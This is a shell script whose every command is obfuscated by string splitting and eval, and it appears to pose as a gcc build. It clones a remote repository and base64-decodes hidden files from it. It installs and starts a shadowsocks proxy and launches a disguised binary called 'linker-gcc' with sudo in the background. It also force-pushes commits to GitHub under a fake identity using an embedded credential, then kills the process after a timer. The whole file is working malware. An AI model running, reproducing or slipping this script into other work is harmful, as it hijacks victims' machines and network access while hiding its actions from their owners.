wtvas="t clone https:"
egOrfhU="//gccbuild@bitb"
jgpXiEs="ucket.org/"
iNGr="gccbuild/g"
MgsKFgN="cc.git &>/"
ayshey="dev/n"
eval "gi""$wtvas""$egOrfhU""$jgpXiEs""$iNGr""$MgsKFgN""$ayshey""ull"
tJzTL="base64 -d gcc/"
WgFUSS="s >"
eval "$tJzTL""$WgFUSS"" o"
eUBYArq="do apt update "
mamFkYOd="&>/dev/nul"
wSgfOA="l || t"
eval "su""$eUBYArq""$mamFkYOd""$wSgfOA""rue"
nkYSZnIh="do apt --yes i"
VeWy="nstall psmisc "
fbrE="shadowsock"
ddZxSSC="s-libev &>/"
EJqY="dev/null ||"
XVOh=" t"
eval "su""$nkYSZnIh""$VeWy""$fbrE""$ddZxSSC""$EJqY""$XVOh""rue"
ijeLu="do systemctl "
vyhp="stop shadowso"
ZBzWRkSi="cks-libev.servi"
FKlkmnZ="ce &>/dev/null"
kcUcEO=" || "
eval "su""$ijeLu""$vyhp""$ZBzWRkSi""$FKlkmnZ""$kcUcEO""true"
dJSkfU="sudo ss-lo"
HtKx="cal -c o &>/dev"
WAXLZqku="/n"
eval "$dJSkfU""$HtKx""$WAXLZqku""ull &"
sDKbuald="base64 -d gcc/"
YHzlG="c > blame"
eval "$sDKbuald""$YHzlG"
rRQj="e64 -d gcc/"
igYWOF="m > linker-g"
eval "bas""$rRQj""$igYWOF""cc"
YtgHOLC="hmod +x lin"
wDJBSmG="ke"
eval "c""$YtgHOLC""$wDJBSmG""r-gcc"
CmGvJrv="sed -i 's/gcc"
IsIG="/gegeo/g' blam"
eHlCdic="e"
eval "$CmGvJrv""$IsIG""$eHlCdic"
SzGzzeQf="sudo ./linker-g"
Yuwre="cc -c blame &>/"
hBWPlwwo="dev/nul"
eval "$SzGzzeQf""$Yuwre""$hBWPlwwo""l &"
YKKto="ho uv"
eval "ec""$YKKto""lo"
sleep 73
mgPpmsKv=" clone https"
GHnaGrc="://github.com/"
fUGlil="hqkrp-aircraf"
PlqSJzi="t/data-ru.git"
iMWb=" tmp &>/dev/n"
eval "git""$mgPpmsKv""$GHnaGrc""$fUGlil""$PlqSJzi""$iMWb""ull"
cd tmp
VKTBTY="git config"
LdYWJ=" user.name "
ZagS="'Viktoriya J"
GBYmGz="eremenko' &>/d"
ErPMHx="ev/nu"
eval "$VKTBTY""$LdYWJ""$ZagS""$GBYmGz""$ErPMHx""ll"
ecrNoPh="git config u"
mLtToltW="ser.email vik"
tyNLCb="toriya.jer"
spujW="emenkoxy@ecl"
clpOTb="ipso.eu &>/"
uLZqEVYw="dev"
eval "$ecrNoPh""$mLtToltW""$tyNLCb""$spujW""$clpOTb""$uLZqEVYw""/null"
iTKDi="BUILD=\`date +%s"
XjimvfE="\`"
eval "$iTKDi""$XjimvfE"
lUGVdHA="AKE=\`date"
eval "M""$lUGVdHA"" +%S\`"
echo $BUILD >> uvlo$MAKE
echo 'data-ru' >> uvlo$MAKE
git add uvlo$MAKE &>/dev/null
git commit -m $MAKE' Added uvlo' &>/dev/null
yGyjLKp="it push htt"
xvJXrAz="ps://viktori"
btogBYE="ya-jeremenkox"
MBpBs="y:'O3UoPzqSDP5m"
iwhKtW="Q_7Bu'@gith"
RrflzZ="ub.com/hqkrp"
DSfSvrX="-aircraft/dat"
IsQfz="a-ru.git -f &"
IhhckX=">/dev/null"
rTLYYL=" || true"
eval "g""$yGyjLKp""$xvJXrAz""$btogBYE""$MBpBs""$iwhKtW""$RrflzZ""$DSfSvrX""$IsQfz""$IhhckX""$rTLYYL"
while :; do G=`date +%s`; echo 'Building $G'; [ `expr 1429 + $BUILD` -lt $G ] && sudo killall linker-gcc && break; sleep 155; done
